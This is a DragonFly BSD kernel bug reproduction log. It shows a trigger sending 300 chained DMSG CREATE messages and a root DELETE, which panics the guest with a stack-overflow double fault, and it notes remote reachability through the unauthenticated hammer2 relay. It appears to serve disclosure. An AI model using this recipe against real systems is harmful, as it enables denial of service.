DF-0017 / run.log

============================================================
 DF-0017 — DECISIVE RUN LOG (full, untrimmed)
============================================================
Guest: DragonFly v6.5.0.1712.g89e6a-DEVELOPMENT (master DEV, X86_64_GENERIC)
Setup: /boot/loader.conf has console="comconsole" so the kernel panic +
       DDB backtrace land on the QEMU serial line (dfbsd-qemu/boot.log);
       QEMU runs headless (-display none), so output on the default
       vidconsole would not be captured.

PRECONDITION (resolved the prior "inconclusive" blocker):
  The hammer2 userland cluster daemon (pid 68, "hammer2: hammer2
  autoconn_thread") connects every disk's DMSG iocom at boot via
  DIOCRECLUSTER (sbin/hammer2/cmd_service.c:898), leaving each disk
  iocom's reader thread blocked in fp_read() on a pipe to the daemon.
  A second DIOCRECLUSTER on the same disk (the one ./trigger issues)
  enters kdmsg_iocom_reconnect() (sys/kern/kern_dmsg.c:141), which
  blocks indefinitely waiting for that stuck reader to exit.  Killing
  the daemon breaks the pipes, the readers get EOF and exit, msgrd_td
  becomes NULL, and a fresh DIOCRECLUSTER then succeeds.  (The root
  hammer2 mount has its own kernel iocom and is unaffected by killing
  the userland daemon.)

  => run.sh performs:  pkill -9 -x hammer2 ; sleep 2 ; ./trigger 300
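
  Userland analogue of the "kill the daemon -> reader gets EOF" step
  above, as a minimal sketch.  Assumptions: a forked child stands in for
  the kernel reader thread, an AF_UNIX socketpair stands in for the pipe
  to the daemon, and the name reader_exits_on_peer_close() is made up
  for this note.  It is not the kernel code path; it only shows that a
  blocked read() returns 0 once every copy of the peer end is closed.

```c
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/*
 * Hypothetical demo helper (not from the DragonFly tree).
 * Returns 1 if the blocked reader exits on EOF after the peer end
 * is closed, 0 on any setup failure or unexpected reader result.
 */
int reader_exits_on_peer_close(void)
{
    int sv[2];
    int status;
    pid_t pid;

    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) != 0)
        return 0;

    pid = fork();
    if (pid < 0) {
        close(sv[0]);
        close(sv[1]);
        return 0;
    }

    if (pid == 0) {
        /* Child: the "reader".  Drop its inherited copy of the peer
         * end, otherwise EOF could never be delivered. */
        char buf[64];
        ssize_t n;

        close(sv[1]);
        /* Blocks here until data arrives, EOF (0), or error (-1). */
        while ((n = read(sv[0], buf, sizeof(buf))) > 0)
            ;
        _exit(n == 0 ? 0 : 1);
    }

    /* Parent: the "daemon" side.  Closing its end models pkill -9. */
    close(sv[0]);
    close(sv[1]);

    /* waitpid() returns only because the reader saw EOF and exited. */
    if (waitpid(pid, &status, 0) != pid)
        return 0;
    return WIFEXITED(status) && WEXITSTATUS(status) == 0;
}
```

  If the parent kept sv[1] open, the child would stay blocked in read()
  and waitpid() would never return, which mirrors the reconnect hang
  described above.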

============================================================
 CONTROL RUN: depth=5  (shallow chain -- must NOT overflow)
============================================================
$ ./trigger 5
[1] opened /dev/vbd0 fd=3
[2] socketpair sv[4,5]
[2a] creating drain thread
[2b] drain thread started
[2c] issuing DIOCRECLUSTER (recl.fd=4)...
[3] DIOCRECLUSTER ok
[*] DMSG iocom attached; sending 5 chained CREATEs + root DELETE
[4] wrote 5 CREATEs
[5] wrote DELETE root (rv=64); waiting for panic...
[6] survived sleep(3); closing sv[1] to trigger EOF path
[7] survived; no panic observed
TRIGGER_EXIT=0

Guest: up.  dmesg: clean (no panic/fault/kdmsg warnings).
=> depth=5 does NOT panic.  Together with the depth=300 run below, this
   shows the panic depends on chain depth (recursion), not on the
   trigger path itself.

============================================================
 PANIC RUN: depth=300  (deep chain -- overflows 16 KB stack)
============================================================
$ ./trigger 300
[1] opened /dev/vbd0 fd=3
[2] socketpair sv[4,5]
[2a] creating drain thread
[2b] drain thread started
[2c] issuing DIOCRECLUSTER (recl.fd=4)...
[3] DIOCRECLUSTER ok
[*] DMSG iocom attached; sending 300 chained CREATEs + root DELETE
<<< guest PANICKED here (ssh died mid-run; remaining buffered stdout lost) >>>

--- guest status: down (frozen in DDB) ---
--- panic captured on serial console (dfbsd-qemu/boot.log): ---

login: DOUBLE FAULT

Fatal double fault
rip = 0xffffffff806564d4
rsp = 0xfffff800ab38f000
rbp = 0xfffff800ab38f000
cpuid = 1; lapic id = 1
panic: double fault
cpuid = 1
Trace beginning at frame 0xfffff8004602eec8
dblfault_handler() at dblfault_handler+0x10c 0xffffffff80bd5f3c 
dblfault_handler() at dblfault_handler+0x10c 0xffffffff80bd5f3c 
Debugger("panic")

CPU1 stopping CPUs: 0x00000001
 stopped
Stopped at      Debugger+0x7c:  movb    $0,0xbd77f9(%rip)
db> 

=> depth=300 PANICS with a kernel-stack-overflow double fault.
   Reproducible (identical signature on a 2nd fresh reset run; see
   panic.txt).  Guest must be reset via `vm.sh reset`.

============================================================
 CONCLUSION
============================================================
REPRODUCED.  Unbounded recursion in kdmsg_simulate_failure() /
kdmsg_state_dying() (sys/kern/kern_dmsg.c:1346 / :1428) overflows the
16 KB LWKT kernel thread stack when a DMSG peer builds a deep circuit
chain (a few hundred CREATE messages; 300 suffices here, 5 does not)
and then tears it down by deleting the root.  Result: guaranteed
kernel panic (double fault) -> full-system DoS.  No guard
page on the LWKT stack, so it is also an (uncontrolled) kernel memory-
corruption primitive.  Reachable locally via DIOCRECLUSTER (root /
operator) or remotely via the unauthenticated HAMMER2 cluster relay
(the hammer2 daemon listens on TCP 987 and relays peer DMSG traffic
into the kernel disk iocom; LNK_AUTH is unimplemented and receive-side
CRC is not verified).
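
Illustration of the bug class only, as a hedged sketch.  The struct and
function names below are hypothetical and are NOT the kernel's
kdmsg_state structures or the kern_dmsg.c code.  The chain is a
simplified stand-in for nested circuit state.  The recursive walk uses
one stack frame per chain level, so its stack use grows with
peer-controlled depth; the iterative walk visits the same nodes with
constant stack.

```c
#include <stddef.h>
#include <stdlib.h>

/* Hypothetical state node; one child per level keeps the demo small. */
struct node {
    struct node *child;   /* next deeper link in the chain */
    int dying;            /* set when teardown has visited the node */
};

/* Free a whole chain without recursion. */
void chain_free(struct node *n)
{
    while (n != NULL) {
        struct node *next = n->child;
        free(n);
        n = next;
    }
}

/* Build a chain of `depth` nodes; returns the root, or NULL if
 * depth is 0 or an allocation fails. */
struct node *chain_build(size_t depth)
{
    struct node *root = NULL;

    for (size_t i = 0; i < depth; i++) {
        struct node *n = calloc(1, sizeof(*n));
        if (n == NULL) {
            chain_free(root);
            return NULL;
        }
        n->child = root;   /* new node becomes the root */
        root = n;
    }
    return root;
}

/* Recursive teardown walk: stack depth equals chain depth. */
size_t mark_dying_recursive(struct node *n)
{
    if (n == NULL)
        return 0;
    n->dying = 1;
    return 1 + mark_dying_recursive(n->child);
}

/* Iterative teardown walk: same visits, constant stack. */
size_t mark_dying_iterative(struct node *n)
{
    size_t count = 0;

    for (; n != NULL; n = n->child) {
        n->dying = 1;
        count++;
    }
    return count;
}
```

Both walks return the number of nodes visited.  For a real tree of
sub-states an explicit worklist (or a hard depth limit enforced at
CREATE time) would be needed instead of the plain loop; which of these
fits the actual kernel code is not established by this run.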